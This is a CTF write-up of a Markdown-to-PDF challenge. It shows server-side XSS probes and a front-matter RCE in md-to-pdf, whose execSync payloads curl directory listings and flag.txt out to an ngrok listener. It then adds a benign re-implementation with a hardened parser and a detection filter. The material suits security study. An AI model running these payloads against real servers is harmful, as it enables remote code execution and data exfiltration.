My Little Website

WEB | 54 pts - 406 solves

Description: I am new to programming and made this simple pdf creator website here, hopefully it is secure enough :)... http://web.chal.csaw.io:5013

The challenge is a Markdown-to-PDF rendering website: whatever we submit gets rendered into the PDF, so we can inject Markdown, or maybe... JavaScript. First thing, check for XSS:

<script> document.write(window.location) </script>

OK, vulnerable. Strictly speaking this is server-side XSS: we are not injecting code into a page in our browser (client-side), the HTML is rendered by a headless browser on the server to produce the PDF, so our script runs on the server side of the application and whatever it writes into the document ends up in the PDF we get back. Let's try something more interesting:

<script>document.write('<iframe src="/"></iframe>')</script>

We're inside the /chal directory of a Node.js webapp, and index.js definitely looks like something interesting for us. Let's try to read it (the fetch URL is relative, so it resolves next to the document being rendered):

<script>
fetch('index.js')
  .then(response => response.text())
  .then(text => document.write(text))
</script>

That's a lot of info, but what matters most is the md-to-pdf package: a quick search turns up a known RCE, https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880. Vulnerable versions hand the document's front matter to gray-matter, whose JavaScript engine evaluates a ---js block as code, so anything we submit can run Node code on the server. First list the current directory and exfiltrate the output with curl to our ngrok listener:

---js
require('child_process').execSync('ls -la > /tmp/tmp.txt && curl -d @/tmp/tmp.txt http://06f6-151-62-28-161.eu.ngrok.io')
---

No flag here, so let's look one directory up:

---js
require('child_process').execSync('ls -la .. > /tmp/tmp.txt && curl -d @/tmp/tmp.txt http://06f6-151-62-28-161.eu.ngrok.io')
---

There it is. Read flag.txt the same way:

---js
require('child_process').execSync('curl -d @../flag.txt http://06f6-151-62-28-161.eu.ngrok.io')
---

CTF{pdf_c0nt1nu3s_70_5uCK}
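For reference, here is a minimal re-implementation of the front-matter dispatch this exploit abuses, next to a hardened variant. This is an added example, not code from the writeup or from md-to-pdf/gray-matter: the engine table, `splitFrontMatter`, `hasJsFrontMatter` and the sample documents are all constructed here. It uses `new Function` where gray-matter uses a direct `eval` inside its own module, which is why the real payload can reach that module's `require` while this benign one only reaches globals such as `process`.

```javascript
// Added example, not md-to-pdf's or gray-matter's code. Models the front-matter
// engine dispatch behind SNYK-JS-MDTOPDF-1657880: the word after the opening "---"
// picks a parser, and the "js" parser executes the block.

// Opening fence with optional language tag, the block, and the closing fence.
const FRONT_MATTER = /^---(\w*)\r?\n([\s\S]*?)\r?\n---\r?\n?/;

// Tiny YAML subset ("key: value" lines), enough for document metadata. Constructed here.
function parseYamlSubset(text) {
  const data = {};
  for (const line of text.split(/\r?\n/)) {
    const m = /^(\w+):\s*(.*)$/.exec(line);
    if (m) data[m[1]] = m[2];
  }
  return data;
}

// The dangerous engine: the block is compiled and run as JavaScript. gray-matter
// does this with a direct eval in its own module, so the real payload can call
// that module's require(); new Function only sees globals (process, etc.), which
// is enough to show execution here without touching child_process.
function evalJsBlock(src) {
  return new Function(`return (${src.trim()});`)() || {};
}

// Vulnerable configuration: JavaScript front matter is accepted.
const vulnerableEngines = {
  '': parseYamlSubset,
  yaml: parseYamlSubset,
  js: evalJsBlock,
  javascript: evalJsBlock,
};

// Hardened configuration: only YAML. Unknown tags are rejected before any code runs.
const hardenedEngines = {
  '': parseYamlSubset,
  yaml: parseYamlSubset,
};

// Split a Markdown document into { data, content } using the given engine table.
function splitFrontMatter(markdown, engines) {
  const m = FRONT_MATTER.exec(markdown);
  if (!m) return { data: {}, content: markdown };
  const [match, lang, block] = m;
  const engine = engines[lang.toLowerCase()];
  if (!engine) throw new Error(`front-matter engine "${lang}" is not allowed`);
  return { data: engine(block), content: markdown.slice(match.length) };
}

// Input filter for a deployment that cannot upgrade yet: true if the document
// opens with ---js or ---javascript front matter.
function hasJsFrontMatter(markdown) {
  const m = FRONT_MATTER.exec(markdown);
  return m !== null && /^(js|javascript)$/i.test(m[1]);
}

// Constructed sample input: a benign stand-in for the writeup's payload.
const SAMPLE_JS_DOC = "---js\n({ title: 'evaluated on ' + process.platform })\n---\n# hello\n";
const SAMPLE_YAML_DOC = "---\ntitle: Report\n---\n# hello\n";

// Runs the same document through both tables and the filter.
function demo() {
  const run = splitFrontMatter(SAMPLE_JS_DOC, vulnerableEngines); // code executed
  let blocked = false;
  try { splitFrontMatter(SAMPLE_JS_DOC, hardenedEngines); } catch (e) { blocked = true; }
  return { executedTitle: run.data.title, blocked, flagged: hasJsFrontMatter(SAMPLE_JS_DOC) };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

Run it with node: the vulnerable table returns a title that was computed by executing the block, the hardened table throws before anything is evaluated, and `hasJsFrontMatter` is the kind of check to put in front of an old md-to-pdf you cannot upgrade yet. The real fix is the one the Snyk advisory gives, upgrading to a version that no longer evaluates JavaScript front matter.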
